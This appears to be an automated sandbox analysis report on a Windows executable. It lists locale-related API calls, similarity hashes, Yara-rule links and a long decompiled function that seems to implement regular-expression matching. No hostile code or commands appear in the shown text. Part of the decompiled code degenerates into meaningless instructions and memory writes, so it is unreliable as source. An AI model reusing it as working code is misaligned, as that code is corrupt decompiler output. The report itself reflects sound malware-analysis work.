0x0042fa4e
0x0042fa53
0x0042fa55
0x0042fa55
0x0042fa5b
0x0042fa60
0x0042fa60
0x0042fa4a
0x0042fa4a
0x00000000
0x0042fa4a
0x0042f991
0x0042f996
0x00000000
0x00000000
0x0042f99c
0x0042f9a1
0x0042f9a3
0x0042f9a3
0x0042f9a9
0x00000000
0x00000000
0x0042f9ae
0x0042f9c5
0x0042f9c5
0x0042f9ce
0x0042f9d0
0x00000000
0x00000000
0x0042f9d2
0x0042f9d7
0x0042f9d9
0x0042f9d9
0x0042f9df
0x00000000
0x00000000
0x0042f9e4
0x0042fa02
0x0042fa04
0x0042fa27
0x00000000
0x0042fa2c
0x0042fa14
0x0042fa1f
0x00000000
0x00000000
0x0042fa21
0x00000000
0x0042fa21
0x0042f9e6
0x0042f9ee
0x00000000
0x00000000
0x0042f9f0
0x0042f9f3
0x0042f9f9
0x00000000
0x00000000
0x00000000
0x0042f9fb
0x0042f9fd
0x0042f9ff
0x00000000
0x0042f9ff
0x0042f9b0
0x0042f9b8
0x00000000
0x00000000
0x0042f9ba
0x0042f9bd
0x0042f9c3
0x00000000
0x00000000
0x00000000
0x0042f9c3
0x0042f9c9
0x0042f9cb
0x00000000

APIs

GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,0042FCA4,?,00000000), ref: 0042FA17
GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,0042FCA4,?,00000000), ref: 0042FA40
GetACP.KERNEL32(?,?,0042FCA4,?,00000000), ref: 0042FA55

Strings

ACP, xrefs: 0042F99C
OCP, xrefs: 0042F9D2

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: fe2068afed7be64aaf73b66e01ff822b201caf66cc0546e7add20438fa09c404
Instruction ID: e157626841e8f7aaf1cde6504f51497b4ffd86498488a5eb614914668bd04181
Opcode Fuzzy Hash: fe2068afed7be64aaf73b66e01ff822b201caf66cc0546e7add20438fa09c404
Instruction Fuzzy Hash: 9E21C4A2B00120AADB349F64E900BA773B6EF54B50BD68577E90EC7310E736DD89C358

Uniqueness

Uniqueness Score: 0.08%

Function 0042F97E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,0042FCA4,?,00000000), ref: 0042FA17
GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,0042FCA4,?,00000000), ref: 0042FA40
GetACP.KERNEL32(?,?,0042FCA4,?,00000000), ref: 0042FA55

Strings

ACP, xrefs: 0042F99C
OCP, xrefs: 0042F9D2

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: fe2068afed7be64aaf73b66e01ff822b201caf66cc0546e7add20438fa09c404
Instruction ID: e157626841e8f7aaf1cde6504f51497b4ffd86498488a5eb614914668bd04181
Opcode Fuzzy Hash: fe2068afed7be64aaf73b66e01ff822b201caf66cc0546e7add20438fa09c404
Instruction Fuzzy Hash: 9E21C4A2B00120AADB349F64E900BA773B6EF54B50BD68577E90EC7310E736DD89C358

Uniqueness

Uniqueness Score: 0.08%

Function 0042F1EA, Relevance: 7.8, APIs: 5, Instructions: 253UNIQUE

Download Yara Rule

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(?,?,?,0041B27E), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,0044B834,000000FF,?,?,?,0041B27E), ref: 00425252

GetACP.KERNEL32(00000055,?,?,?,?,?,004241F2,?,?,?,?,?,?,00000004), ref: 0042F2AB
IsValidCodePage.KERNEL32(00000000,00000055,?,?,?,?,?,004241F2,?,?,?,?,?,?,00000004), ref: 0042F2D6

Part of subcall function 00425DD7: GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,00000002,?,?,?,0042A118,?,00001004,?,00000002,?,?,00000000), ref: 00425E0B

_wcschr.LIBVCRUNTIME ref: 0042F36A
_wcschr.LIBVCRUNTIME ref: 0042F378
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004241F2,00000000,00424312), ref: 0042F43B

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorInfoLastLocale_free_wcschr$CodePageValid
String ID:
API String ID: 1880702064-0
Opcode ID: b676a21f8a0140ebc5e0038d36323095d1216e7fdaa490fe9065fa2623852125
Instruction ID: 5f129e5063b6be76bd08a7cad2a1042a69838f8af12729a5e127d93b16c5962c
Opcode Fuzzy Hash: b676a21f8a0140ebc5e0038d36323095d1216e7fdaa490fe9065fa2623852125
Instruction Fuzzy Hash: 67711731B00625AAEB24EB66EC46B7773B8EF49304FD0007BF905D7281EA799905C76D

Uniqueness

Uniqueness Score: 23.02%

Function 0040ABD0, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 342
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0040ABD0(signed int __ebx, signed int __ecx, void* __edi) {
				intOrPtr _t319;
				intOrPtr _t320;
				signed int _t322;
				void* _t324;
				void* _t325;
				void* _t326;
				signed int _t338;
				signed int _t339;
				signed int _t342;
				signed int _t353;
				signed int _t361;
				signed int _t363;
				intOrPtr _t370;
				intOrPtr _t372;
				signed int _t374;
				signed int _t376;
				signed int _t387;
				intOrPtr _t402;
				signed int _t404;
				signed int _t406;
				signed int _t409;
				void* _t412;
				signed int _t414;
				signed int* _t416;
				void* _t418;
				void* _t419;
				void* _t420;
				void* _t422;
				signed int* _t424;
				signed int* _t425;

				_t387 = __ecx;
				_t374 = __ebx;
				_t420 = _t419 - 0x18;
				_push(__edi);
				_t406 = __ecx;
				_t319 =  *((intOrPtr*)(__ecx + 0x7c));
				if(_t319 <= 0) {
					L2:
					_t320 =  *((intOrPtr*)(_t406 + 0x78));
					if(_t320 <= 0) {
						L4:
						_push(_t374);
						_push(_t414);
						_t414 =  *(_t420 + 0x28);
						 *((intOrPtr*)(_t420 + 0xc)) = 0;
						_push(_t409);
						if(_t414 == 0) {
							L16:
							_t322 =  *(_t406 + 0x7c);
							if(_t322 > 0) {
								_t322 = _t322 + 1;
								 *(_t406 + 0x7c) = _t322;
							}
							return _t322 & 0xffffff00 |  *(_t420 + 0x10) == 0x00000000;
						} else {
							_t374 = 1;
							while(1) {
								L6:
								_t402 =  *((intOrPtr*)(_t414 + 4));
								_t387 = _t402 - 1;
								if(_t387 > 0x14) {
									goto L79;
								}
								switch( *((intOrPtr*)(_t387 * 4 +  &M0040AFD4))) {
									case 0:
										L40:
										if(_t368 != 0) {
											goto L16;
										} else {
											_t374 = 1;
											goto L42;
										}
										goto L166;
									case 1:
										_t401 =  *(_t406 + 0x60);
										if((_t401 & 0x00000101) == 1) {
											goto L15;
										} else {
											if((_t401 & 0x00000100) != 0 ||  *_t406 !=  *((intOrPtr*)(_t406 + 0x4c))) {
												_t368 =  *_t406 & 0xffffff00 |  *((char*)( *_t406 - 1)) != 0x0000000a;
												 *(_t420 + 0x10) = _t368;
											} else {
												goto L39;
											}
											goto L40;
										}
										goto L166;
									case 2:
										__eflags =  *(__edi + 0x60) & 0x00000002;
										if(( *(__edi + 0x60) & 0x00000002) != 0) {
											goto L15;
										} else {
											__ecx =  *__edi;
											__eflags = __ecx -  *((intOrPtr*)(__edi + 0x50));
											if(__eflags == 0) {
												goto L40;
											} else {
												__eflags =  *__ecx - 0xa;
												if(__eflags == 0) {
													goto L40;
												} else {
													goto L15;
												}
											}
										}
										goto L166;
									case 3:
										__ecx =  *(__edi + 0x60);
										__eflags = __cl & 0x00000004;
										if((__cl & 0x00000004) == 0) {
											L21:
											__eflags = __cl & 0x00000008;
											if((__cl & 0x00000008) == 0) {
												L24:
												__eax =  *__edi;
												__eflags = __eax -  *(__edi + 0x4c);
												if(__eax !=  *(__edi + 0x4c)) {
													L27:
													__al =  *(__eax - 1);
													__eax =  *(__eax - 1);
													__eax = E00416AE0("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_", __eax);
													__eflags = __eax;
													_t41 = __eax != 0;
													__eflags = _t41;
													__ebx = __ebx & 0xffffff00 | _t41;
												} else {
													__eflags = __ecx & 0x00000100;
													if((__ecx & 0x00000100) != 0) {
														goto L27;
													} else {
														__bl = 0;
													}
												}
												__eax =  *__edi;
												__eflags = __eax -  *((intOrPtr*)(__edi + 0x50));
												if(__eax !=  *((intOrPtr*)(__edi + 0x50))) {
													__al =  *__eax;
													__eax =  *__eax;
													__eax = E00416AE0("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_", __eax);
													__eflags = __eax;
													_t44 = __eax != 0;
													__eflags = _t44;
													__ecx = __ecx & 0xffffff00 | _t44;
												} else {
													__cl = 0;
												}
												__cl = __cl ^ __bl;
												__eflags = __cl;
											} else {
												__eax =  *__edi;
												__eflags =  *__edi -  *((intOrPtr*)(__edi + 0x50));
												if( *__edi !=  *((intOrPtr*)(__edi + 0x50))) {
													goto L24;
												} else {
													goto L23;
												}
											}
										} else {
											__eax =  *__edi;
											__eflags =  *__edi -  *(__edi + 0x4c);
											if( *__edi ==  *(__edi + 0x4c)) {
												L23:
												__cl = 0;
											} else {
												goto L21;
											}
										}
										__al =  *(__ebp + 8);
										__al =  *(__ebp + 8) & 0x00000001;
										__eflags = __cl - __al;
										if(__eflags == 0) {
											goto L15;
										} else {
											goto L39;
										}
										goto L166;
									case 4:
										__eax =  *__edi;
										__eflags = __eax -  *((intOrPtr*)(__edi + 0x50));
										if(__eax ==  *((intOrPtr*)(__edi + 0x50))) {
											goto L15;
										} else {
											__cl =  *__eax;
											__eflags = __cl - 0xa;
											if(__cl == 0xa) {
												goto L15;
											} else {
												__eflags = __cl - 0xd;
												if(__cl == 0xd) {
													goto L15;
												} else {
													__eax = __eax + 1;
													__eflags = __eax;
													goto L38;
												}
											}
										}
										goto L166;
									case 5:
										__ecx =  *(__ebp + 0x1c);
										 *((intOrPtr*)(__ebp + 0x18)) =  *((intOrPtr*)(__ebp + 0x18)) +  *(__ebp + 0x1c);
										__eax = E004021B0( *__edi,  *((intOrPtr*)(__edi + 0x50)),  *(__ebp + 0x1c),  *((intOrPtr*)(__ebp + 0x18)) +  *(__ebp + 0x1c),  *((intOrPtr*)(__edi + 0x70)),  *((intOrPtr*)(__edi + 0x5c)));
										__eflags = __eax -  *__edi;
										if(__eflags == 0) {
											goto L15;
										} else {
											L38:
											 *__edi = __eax;
											goto L39;
										}
										goto L166;
									case 6:
										__eax =  *__edi;
										__eflags =  *__edi -  *((intOrPtr*)(__edi + 0x50));
										if( *__edi ==  *((intOrPtr*)(__edi + 0x50))) {
											goto L15;
										} else {
											_push(__ebp);
											__ecx = __edi;
											__eax = E00407B80(__edi);
											__eflags = __al;
											if(__eflags == 0) {
												goto L15;
											} else {
												__al = 0;
												 *(__esp + 0x10) = __eax;
												L42:
												if(_t414 == 0) {
													goto L16;
												} else {
													_t414 =  *(_t414 + 0xc);
													if(_t414 != 0) {
														goto L6;
													} else {
														goto L16;
													}
												}
											}
										}
										goto L166;
									case 7:
										__eax =  *__edi;
										__esi = __edi + 4;
										__eflags = __edx - 0xb;
										 *(__esp + 0x2c) = __eax;
										__ecx = __esp + 0x1c;
										 *(__esp + 0x18) = __eax;
										__ebx = __ebx & 0xffffff00 | __edx == 0x0000000b;
										E004044E0(__esp + 0x1c, __edx, __esi) =  *((intOrPtr*)(__esi + 0xc));
										__ecx = __edi;
										 *(__esp + 0x28) =  *((intOrPtr*)(__esi + 0xc));
										__eax = E0040ABD0(__ebx, __edi, __edi,  *(__ebp + 0x14));
										__eflags = __al - __bl;
										if(__al != __bl) {
											__eax =  *(__esp + 0x2c);
											__ecx = __esp + 0x14;
											 *__edi =  *(__esp + 0x2c);
											__eax = E00404AC0(__esp + 0x14);
										} else {
											__eax = __esp + 0x14;
											__ecx = __edi;
											__eax = E00404EF0(__edi, __esp + 0x14);
											__ecx = __esp + 0x14;
											 *(__esp + 0x10) = 1;
											__eax = E00404AC0(__esp + 0x14);
										}
										goto L39;
									case 8:
										L64:
										__ebp = 0;
										goto L40;
									case 9:
										__edx =  *(__ebp + 0x14);
										__ecx =  *(__edi + 0x14);
										__eax =  *__edi;
										 *( *(__edi + 0x14) + __edx * 8) =  *__edi;
										__esi =  *(__edi + 0x10);
										__eflags =  *(__ebp + 0x14) - __esi;
										while(__eflags < 0) {
											__ecx =  *(__edi + 4);
											__esi = __esi - 1;
											__esi = __esi >> 5;
											__edx =  *(__edi + 4) + (__esi >> 5) * 4;
											__ecx = __esi;
											__eax =  *__edx;
											__ecx = __esi & 0x0000001f;
											asm("btr eax, ecx");
											__eflags =  *(__ebp + 0x14) - __esi;
										}
										goto L39;
									case 0xa:
										__eflags =  *((char*)(__edi + 0x65));
										__esi =  *(__ebp + 0x14);
										if(__eflags != 0) {
											L58:
											__edx =  *(__esi + 0x14);
											__eax = __edx;
											__ecx =  *(__edi + 4);
											__edx = __edx & 0x0000001f;
											__ecx =  *(__edi + 4) + __eax * 4;
											__eax =  *__ecx;
											asm("bts eax, edx");
											__edx =  *(__esi + 0x14);
											__ecx =  *(__edi + 0x14);
											__eax =  *__edi;
											 *( *(__edi + 0x14) + 4 + __edx * 8) =  *__edi;
											goto L39;
										} else {
											__eflags =  *(__esi + 0x14);
											if(__eflags != 0) {
												goto L58;
											}
										}
										goto L40;
									case 0xb:
										__esi =  *(__ebp + 0x14);
										__eax = __esi;
										__ecx =  *(__edi + 4);
										__eax = __esi >> 5;
										__edx =  *(__edi + 4) + (__esi >> 5) * 4;
										__esi = __esi & 0x0000001f;
										__ebx = __ebx << __cl;
										__eflags =  *__edx & __ebx << __cl;
										if(__eflags == 0) {
											L39:
											_t368 =  *(_t420 + 0x10);
											goto L40;
										} else {
											__eax =  *(__edi + 0x14);
											__ecx =  *__edi;
											__edx =  *(__eax + __esi * 8);
											__eflags = __edx - __eax;
											if(__eflags == 0) {
												L62:
												 *__edi = __ecx;
												goto L39;
											} else {
												__ecx = __eax;
												__eflags = __ecx -  *__edi;
												if(__eflags == 0) {
													L15:
													 *(_t420 + 0x10) = 1;
													goto L16;
												} else {
													goto L62;
												}
											}
										}
										goto L166;
									case 0xc:
										_push(__ebp);
										__ecx = __edi;
										__eax = E00408030(__edi, __edx);
										__ecx =  *(__esp + 0x10);
										__eflags = __al;
										__ecx = __cl & 0x000000ff;
										__eax = __ecx;
										 *(__esp + 0x10) = __ecx;
										__eax =  ==  ? __ebx : __ecx;
										 *(__esp + 0x10) =  ==  ? __ebx : __ecx;
										goto L64;
									case 0xd:
										__eax =  *(__ebp + 8);
										__ecx = __edi;
										__eax =  *(__ebp + 8) >> 1;
										__al = __al & 0x00000001;
										_push(0);
										__eax = __al & 0x000000ff;
										_push(__al & 0x000000ff);
										_push(__ebp);
										__eax = E00408DE0(__edi, __edx);
										__edx =  *(__esp + 0x10);
										__eflags = __al;
										__dl & 0x000000ff =  ==  ? __ebx : __dl & 0x000000ff;
										__ebp = 0;
										__al = __cl;
										 *(__esp + 0x10) = __eax;
										goto L40;
									case 0xe:
										__edx =  *(__ebp + 0x14);
										__eax =  *(__edi + 0x40);
										__eflags =  *(__edx + 0x24);
										__ecx =  *(__edx + 0x20);
										if(__eflags != 0) {
											goto L76;
										} else {
											_push( *((intOrPtr*)(__eax + __ecx * 8)));
											__eax =  *(__edx + 8);
											__ecx = __edi;
											__eax =  *(__edx + 8) >> 1;
											__al = __al & 0x00000001;
											__eax = __al & 0x000000ff;
											_push(__al & 0x000000ff);
											_push(__edx);
											__eax = E00408DE0(__edi, __edx);
											__edx =  *(__esp + 0x10);
											__eflags = __al;
											__dl & 0x000000ff =  ==  ? __ebx : __dl & 0x000000ff;
											__ebp = 0;
											__al = __cl;
											 *(__esp + 0x10) = __eax;
										}
										goto L40;
									case 0xf:
										__eflags =  *(__edi + 0x60) & 0x00002020;
										if(( *(__edi + 0x60) & 0x00002020) == 0) {
											L70:
											__eflags =  *((char*)(__edi + 0x74));
											if( *((char*)(__edi + 0x74)) == 0) {
												L73:
												__eflags =  *((char*)(__edi + 0x64));
												if(__eflags == 0) {
													L75:
													__ecx = __edi + 0x20;
													__eax = E00404EB0(__edi + 0x20, __edi);
													 *((char*)(__edi + 0x64)) = 1;
												} else {
													__ecx = __edi;
													__eax = E00406C70(__edi);
													__eflags = __al;
													if(__eflags != 0) {
														goto L75;
													}
												}
												L76:
												__eax =  *(__esp + 0x10);
												__ebp = 0;
											} else {
												__eax =  *__edi;
												__eflags = __eax -  *((intOrPtr*)(__edi + 0x50));
												if(__eflags == 0) {
													goto L73;
												} else {
													goto L72;
												}
											}
										} else {
											__eax =  *(__edi + 0x4c);
											__eflags = __eax -  *__edi;
											if(__eflags == 0) {
												L72:
												__al = 1;
												__ebp = 0;
												 *(__esp + 0x10) = __eax;
											} else {
												goto L70;
											}
										}
										goto L40;
								}
							}
							goto L79;
						}
					} else {
						_t370 = _t320 - 1;
						 *((intOrPtr*)(_t406 + 0x78)) = _t370;
						if(_t370 <= 0) {
							goto L78;
						} else {
							goto L4;
						}
					}
				} else {
					_t372 = _t319 - 1;
					 *((intOrPtr*)(__ecx + 0x7c)) = _t372;
					if(_t372 <= 0) {
						E0041373B(__ebx, __ecx, __eflags, 0xc);
						L78:
						E0041373B(_t374, _t406, __eflags, 0xb);
						L79:
						_t324 = E0041373B(_t374, _t406, __eflags, 0xd);
						__eflags = _t324 - 0x280040ad;
						asm("lodsb");
						_t325 = _t324 + 1;
						 *((intOrPtr*)(_t420 + 0x40 + _t414 * 4)) =  *((intOrPtr*)(_t420 + 0x40 + _t414 * 4)) + _t374;
						 *((intOrPtr*)(_t325 + 0x170040ac)) =  *((intOrPtr*)(_t325 + 0x170040ac)) + _t374;
						asm("lodsd");
						_t326 = _t325 + 1;
						 *((intOrPtr*)(_t402 - 0x53)) =  *((intOrPtr*)(_t402 - 0x53)) + _t326;
						 *((intOrPtr*)(_t387 + 0x3d0040ad)) =  *((intOrPtr*)(_t387 + 0x3d0040ad)) + _t387;
						asm("lodsd");
						 *0xac0040ad =  *0xac0040ad + _t374;
						asm("lodsd");
						 *((intOrPtr*)(_t414 + _t414 * 4 - 0x5107ffc0)) =  *((intOrPtr*)(_t414 + _t414 * 4 - 0x5107ffc0)) + _t387;
						 *_t387 =  *_t387 + _t402;
						asm("scasb");
						 *((intOrPtr*)(_t402 - 0x52)) =  *((intOrPtr*)(_t402 - 0x52)) + _t387;
						 *((intOrPtr*)(_t409 - 0x25ffbf52)) =  *((intOrPtr*)(_t409 - 0x25ffbf52)) + _t326 + 6;
						asm("scasb");
						 *0xff0040ad =  *0xff0040ad + _t374;
						asm("scasb");
						 *0x3d0040af =  *0x3d0040af + _t387;
						asm("lodsd");
						 *((intOrPtr*)(_t374 - 0x51)) =  *((intOrPtr*)(_t374 - 0x51)) + _t387;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t422 = _t420 - 0x20;
						_push(_t414);
						_t416 = _t387;
						_t338 = _t416[0x1f];
						__eflags = _t338;
						if(_t338 <= 0) {
							L82:
							_t339 = _t416[0x1e];
							__eflags = _t339;
							if(_t339 <= 0) {
								L84:
								_push(_t374);
								_t374 =  *(_t422 + 0x2c);
								 *((char*)(_t422 + 8)) = 0;
								_push(_t409);
								_push(_t406);
								__eflags = _t374;
								if(_t374 == 0) {
									L153:
									_t376 =  *(_t422 + 0x10);
									goto L154;
								} else {
									_t406 = 1;
									while(1) {
										L86:
										_t387 =  *(_t374 + 4);
										_t342 = _t387 - 1;
										__eflags = _t342 - 0x14;
										if(__eflags > 0) {
											goto L159;
										}
										switch( *((intOrPtr*)(_t342 * 4 +  &M0040B418))) {
											case 0:
												L149:
												_t359 =  *(_t422 + 0x10);
												goto L150;
											case 1:
												_t400 = _t416[0x18];
												__eflags = (_t400 & 0x00000101) - 1;
												if((_t400 & 0x00000101) == 1) {
													goto L95;
												} else {
													__eflags = _t400 & 0x00000100;
													if((_t400 & 0x00000100) != 0) {
														L91:
														_t358 =  *_t416;
														__eflags =  *((char*)(_t358 - 1)) - 0xa;
														_t359 = _t358 & 0xffffff00 |  *((char*)(_t358 - 1)) != 0x0000000a;
														 *(_t422 + 0x10) = _t359;
													} else {
														__eflags =  *_t416 - _t416[0x13];
														if( *_t416 == _t416[0x13]) {
															goto L149;
														} else {
															goto L91;
														}
													}
													L150:
													__eflags = _t359;
													if(_t359 != 0) {
														goto L153;
													} else {
														goto L151;
													}
												}
												goto L166;
											case 2:
												__eflags =  *(__ebp + 0x60) & 0x00000002;
												if(( *(__ebp + 0x60) & 0x00000002) != 0) {
													goto L95;
												} else {
													__eax =  *__ebp;
													__eflags = __eax -  *((intOrPtr*)(__ebp + 0x50));
													if(__eax ==  *((intOrPtr*)(__ebp + 0x50))) {
														goto L149;
													} else {
														__eflags =  *__eax - 0xa;
														if( *__eax == 0xa) {
															goto L149;
														} else {
															goto L95;
														}
													}
												}
												goto L166;
											case 3:
												__ecx =  *(__ebp + 0x60);
												__eflags = __cl & 0x00000004;
												if((__cl & 0x00000004) == 0) {
													L98:
													__eflags = __cl & 0x00000008;
													if((__cl & 0x00000008) == 0) {
														L101:
														__eax =  *__ebp;
														__eflags = __eax -  *(__ebp + 0x4c);
														if(__eax !=  *(__ebp + 0x4c)) {
															L104:
															__al =  *(__eax - 1);
															__eax =  *(__eax - 1);
															__eax = E00416AE0("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_", __eax);
															__eflags = __eax;
															_t191 = __esp + 0x34;
															 *_t191 = __eax != 0;
															__eflags =  *_t191;
														} else {
															__eflags = __ecx & 0x00000100;
															if((__ecx & 0x00000100) != 0) {
																goto L104;
															} else {
																 *(__esp + 0x34) = 0;
															}
														}
														__eax =  *__ebp;
														__eflags = __eax -  *((intOrPtr*)(__ebp + 0x50));
														if(__eax !=  *((intOrPtr*)(__ebp + 0x50))) {
															__al =  *__eax;
															__eax =  *__eax;
															__eax = E00416AE0("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_", __eax);
															__eflags = __eax;
															_t194 = __eax != 0;
															__eflags = _t194;
															__ecx = __ecx & 0xffffff00 | _t194;
														} else {
															__cl = 0;
														}
														__cl = __cl ^  *(__esp + 0x34);
														__eflags = __cl;
													} else {
														__eax =  *__ebp;
														__eflags =  *__ebp -  *((intOrPtr*)(__ebp + 0x50));
														if( *__ebp !=  *((intOrPtr*)(__ebp + 0x50))) {
															goto L101;
														} else {
															goto L100;
														}
													}
												} else {
													__eax =  *__ebp;
													__eflags =  *__ebp -  *(__ebp + 0x4c);
													if( *__ebp ==  *(__ebp + 0x4c)) {
														L100:
														__cl = 0;
													} else {
														goto L98;
													}
												}
												__al =  *(__ebx + 8);
												__al =  *(__ebx + 8) & 0x00000001;
												__eflags = __cl - __al;
												if(__cl == __al) {
													goto L95;
												} else {
													goto L149;
												}
												goto L166;
											case 4:
												__eax =  *__ebp;
												__eflags = __eax -  *((intOrPtr*)(__ebp + 0x50));
												if(__eax ==  *((intOrPtr*)(__ebp + 0x50))) {
													goto L95;
												} else {
													__cl =  *__eax;
													__eflags = __cl - 0xa;
													if(__cl == 0xa) {
														goto L95;
													} else {
														__eflags = __cl - 0xd;
														if(__cl == 0xd) {
															goto L95;
														} else {
															 *__ebp = __eax;
															goto L149;
														}
													}
												}
												goto L166;
											case 5:
												__ecx =  *(__ebx + 0x1c);
												 *(__ebx + 0x18) =  *(__ebx + 0x18) +  *(__ebx + 0x1c);
												__eflags =  *(__ebx + 0x18) +  *(__ebx + 0x1c);
												__eax = __esp + 0x28;
												__eax = E00402240(__esp + 0x28,  *__ebp,  *((intOrPtr*)(__ebp + 0x50)),  *(__ebx + 0x1c), __esp + 0x28,  *((intOrPtr*)(__ebp + 0x70)),  *((intOrPtr*)(__ebp + 0x5c)));
												goto L116;
											case 6:
												__eax =  *__ebp;
												__eflags =  *__ebp -  *((intOrPtr*)(__ebp + 0x50));
												if( *__ebp ==  *((intOrPtr*)(__ebp + 0x50))) {
													goto L95;
												} else {
													_push(__ebx);
													__ecx = __ebp;
													__eax = E00407C80(__ecx);
													__eflags = __al;
													if(__al == 0) {
														goto L95;
													} else {
														 *(__esp + 0x10) = 0;
														L151:
														__eflags = _t374;
														if(_t374 == 0) {
															goto L153;
														} else {
															_t374 =  *(_t374 + 0xc);
															 *(_t422 + 0x34) = _t374;
															__eflags = _t374;
															if(_t374 != 0) {
																goto L86;
															} else {
																goto L153;
															}
														}
													}
												}
												goto L166;
											case 7:
												__esi =  *__ebp;
												__edi = __ebp + 4;
												__eflags = __ecx - 0xb;
												 *(__esp + 0x1c) = __esi;
												__ecx = __esp + 0x24;
												__ebx = __ebx & 0xffffff00 | __eflags == 0x00000000;
												E004044E0(__esp + 0x24, __edx, __edi) =  *(__edi + 0xc);
												__ecx = __ebp;
												 *(__esp + 0x2c) =  *(__edi + 0xc);
												__eax =  *(__esp + 0x34);
												_push( *((intOrPtr*)( *(__esp + 0x34) + 0x14)));
												L80();
												__eflags = __al - __bl;
												if(__al != __bl) {
													 *__ebp = __esi;
												} else {
													__eax = __esp + 0x1c;
													__ecx = __ebp;
													__eax = E00404EF0(__ebp, __esp + 0x1c);
													 *(__esp + 0x10) = 1;
												}
												__ecx = __esp + 0x1c;
												__eax = E00404AC0(__ecx);
												__ebx =  *(__esp + 0x34);
												__edi = 1;
												goto L149;
											case 8:
												L148:
												__ebx = 0;
												__eflags = 0;
												goto L149;
											case 9:
												__edx =  *(__ebx + 0x14);
												__ecx =  *(__ebp + 0x14);
												__eax =  *__ebp;
												 *(__ecx + __edx * 8) =  *__ebp;
												__esi =  *(__ebp + 0x10);
												__eflags =  *(__ebx + 0x14) - __esi;
												while( *(__ebx + 0x14) < __esi) {
													__ecx =  *(__ebp + 4);
													__esi = __esi - 1;
													__esi = __esi >> 5;
													__edx =  *(__ebp + 4) + (__esi >> 5) * 4;
													__ecx = __esi;
													__eax =  *__edx;
													__ecx = __esi & 0x0000001f;
													asm("btr eax, ecx");
													__eflags =  *(__ebx + 0x14) - __esi;
												}
												goto L149;
											case 0xa:
												__eflags =  *((char*)(__ebp + 0x65));
												__esi =  *(__ebx + 0x14);
												if( *((char*)(__ebp + 0x65)) != 0) {
													L131:
													__edx =  *(__esi + 0x14);
													__eax = __edx;
													__ecx =  *(__ebp + 4);
													__edx = __edx & 0x0000001f;
													__ecx =  *(__ebp + 4) + __eax * 4;
													__eax =  *__ecx;
													asm("bts eax, edx");
													__edx =  *(__esi + 0x14);
													__ecx =  *(__ebp + 0x14);
													__eax =  *__ebp;
													 *(__ecx + 4 + __edx * 8) =  *__ebp;
												} else {
													__eflags =  *(__esi + 0x14);
													if( *(__esi + 0x14) != 0) {
														goto L131;
													}
												}
												goto L149;
											case 0xb:
												__esi =  *(__ebx + 0x14);
												__eax = __esi;
												__ecx =  *(__ebp + 4);
												__eax = __esi >> 5;
												__edx =  *(__ebp + 4) + (__esi >> 5) * 4;
												__ecx = __esi;
												__ecx = __esi & 0x0000001f;
												__eax = __edi;
												__eax = __edi << __cl;
												__eflags =  *__edx & __eax;
												if(( *__edx & __eax) == 0) {
													goto L149;
												} else {
													__ecx =  *(__ebp + 0x14);
													__eax =  *__ebp;
													__edx =  *(__ebp + 0x14) + __esi * 8;
													__ecx =  *__edx;
													__edx =  *(__edx + 4);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														L117:
														 *__ebp = __eax;
														goto L149;
													} else {
														__eax = __esp + 0x30;
														__eax = E004022E0(__esp + 0x30, __esp + 0x30,  *((intOrPtr*)(__ebp + 0x50)), __ecx, __edx,  *((intOrPtr*)(__ebp + 0x70)),  *((intOrPtr*)(__ebp + 0x5c)));
														L116:
														__eax =  *__eax;
														__esp = __esp + 0x1c;
														__eflags = __eax -  *__ebp;
														if(__eax ==  *__ebp) {
															L95:
															_t376 = 1;
															L154:
															_t340 = _t416[0x1f];
															__eflags = _t340;
															if(_t340 > 0) {
																_t340 = _t340 + 1;
																__eflags = _t340;
																_t416[0x1f] = _t340;
															}
															__eflags = _t376;
															_t284 = _t376 == 0;
															__eflags = _t284;
															return _t340 & 0xffffff00 | _t284;
														} else {
															goto L117;
														}
													}
												}
												goto L166;
											case 0xc:
												_push(__ebx);
												__ecx = __ebp;
												__eax = E00408350(__ecx, __edx);
												__ebx =  *(__esp + 0x10);
												__eflags = __al;
												__bl & 0x000000ff =  ==  ? __edi : __bl & 0x000000ff;
												 *(__esp + 0x10) =  ==  ? __edi : __bl & 0x000000ff;
												goto L148;
											case 0xd:
												 *(__ebx + 8) =  *(__ebx + 8) >> 1;
												__al = __al & 0x00000001;
												__eflags = __al;
												_push(0);
